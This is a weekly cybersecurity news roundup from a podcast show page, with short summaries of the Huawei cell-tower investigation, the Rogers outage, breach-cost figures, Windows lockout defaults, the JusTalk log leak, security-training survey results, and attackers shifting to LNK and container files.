Week in Review: Chinese, Huawei misdeeds, Poor cybersecurity training, Data breach costs

This week’s Cyber Security Headlines – Week in Review, June 6-10, is hosted by Rich Stroffolino with our guest, Deneen DeFiore, VP, CISO, United Airlines

Cyber Security Headlines – Week in Review is live every Friday at 12:30pm PT/3:30pm ET. Join us each week by registering for the open discussion at CISOSeries.com

FBI uncovers Chinese and Huawei misdeeds

Since at least 2017, federal officials have been investigating Chinese land purchases near critical infrastructure, and pursuing what they saw as clear efforts to plant listening devices near sensitive military and government facilities.  Among the most alarming things the FBI uncovered pertains to Chinese-made Huawei equipment atop cell towers near US military bases in the rural Midwest. According to multiple sources familiar with the matter, the FBI determined the equipment was capable of capturing and disrupting highly restricted Defense Department communications, including those used by US Strategic Command, which oversees the country’s nuclear weapons. In addition a proposed $100 million ornate Chinese garden at the National Arboretum in Washington DC included a pagoda, which investigators noted would have been strategically placed on one of the highest points in Washington DC, just two miles from the US Capitol, a perfect spot for signals intelligence collection.

(CNN) 

Coding error to blame for Rogers outage 

Rogers Communications has disclosed the cause of the outage which began early on July 8 leaving millions without cellphone and internet service. Rogers said a coding update deleted a routing filter allowing all possible routes to the Internet to pass through their routers which flooded and overwhelmed the core network. Rogers CEO apologized for the massive service outage and indicated the company has hired a third party to further investigate the root cause. Officials from Rogers and a slew of other stakeholders appeared at a parliamentary committee on Monday in Ottawa to further explain the cause of the outage, and to outline the steps they are taking to ensure it doesn’t happen again.

(CBC)

What is the cost of an average data breach?

According to a new report from IBM security, the average cost of a data breach increased 2.6% on the year to an all-time record of $4.4 million in 2022. Since the start of 2020, the average data breach cost rose 13%. The report found that over 50% of organizations surveyed said they increased the cost of products and services to offset the cost of breaches. This average cost isn’t just based on the immediate expense of a breach, whether paying a ransom or containing a breach, but also accounts for longer term expenses like regulatory fines and lost sales. 83% of respondents reported more than one breach.

(CNET)

Windows adds brute force defense

Windows updated the defaults on Windows 11 Insider Preview builds to lock accounts for 10 minutes after 10 sign-in attempts. Vice president for OS security David Weston said this is meant to mitigated Remote Desktop Protocol and other brute-force password vectors. Microsoft does warn that this change may result in denial-of-service attacks on open RDP ports. If this setting sounds great to you, you can already use it in Windows 10, it’s just not on by default. 

(The Hacker News)

Thanks to our show sponsor, Snyk

Developers want to code fast and security wants to ship securely. And that’s why they both choose Snyk.
Backed by industry-leading security intelligence, Snyk provides real-time scanning with automated fixes and remediation advice right from the tools and workflows developers use.

Code, dependencies, containers, cloud infrastructure… all of it.

And while developers are building securely, Snyk gives security teams a bird’s eye view of all of their projects, so they can prioritize and focus their efforts in the right places.

Developer tested. Security approved. Start your free Snyk account at snyk.co/cybersecurity.

JusTalk logs leak

Last week, security researcher Anurag Sen discovered an exposed online database containing hundreds of gigabytes of log data for the messaging app JusTalk. The plaintext logs contained phone numbers of the sender, the recipient, and the message itself, as well as any calls made. The logs also have granular location data, showing large clusters of users in the U.S., U.K., India, Saudi Arabia, Thailand and mainland China. The database was hosted by Huawei in China. Shodan shows the server continually storing monthly chat logs. JustTalk claims its app uses end-to-end encryption. This week, Sen discovered an undated ransom note left on the database, indicating it was accessed at least once by a malicious actor. Attempts to contact the company about the leak were unsuccessful. 

(TechCrunch)

Poor training and communications hindering cybersecurity efforts

A new report from Tessian indicates that three in four companies in the UK and US experienced a security incident in the last year. The report highlights that employees don’t understand their role in protecting the company, with nearly half (45%) of workers indicating they didn’t know who to report a security incident to, and 30% believing they had no role in helping with cybersecurity. While 85% of employees participate in security awareness programs, almost two-thirds (64%) don’t pay full attention during the training and over a third (36%) consider the security training boring. Additionally, mismanaged anti-phishing exercises are an issue for half of employees, who said they have had negative experiences with phishing simulations. 

(Infosecurity Magazine)

Hackers opting for new attack methods after Microsoft blocked macros by default

With Microsoft taking steps to block Excel 4.0 and Visual Basic for Applications macros by default across Office apps, malicious actors are responding by refining their new tactics, techniques, and procedures. A report from Proofpoint says that in its place, adversaries are moving to container files such as ISO and RAR as well as Windows Shortcut (LNK) files in campaigns to distribute malware, which Proofpoint calls a significant shift in the threat landscape. “The number of campaigns containing LNK files increased 1,675% since October 2021,” the enterprise security company noted, adding the number of attacks using HTML attachments more than doubled from October 2021 to June 2022.

(The Hacker News)